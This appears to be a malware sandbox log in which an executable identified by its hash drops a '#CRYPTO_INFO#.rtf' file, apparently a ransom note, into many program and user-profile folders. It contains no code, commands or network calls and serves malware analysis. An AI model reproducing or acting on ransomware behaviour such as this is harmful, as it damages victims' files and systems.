8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Pictures\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\HoloShell_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\storage\default\moz-extension+++9c60e9c0-f49a-444b-8b0d-ae16b1b09ce8^userContextId=4294967295\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\#CRYPTO_INFO#.rtf 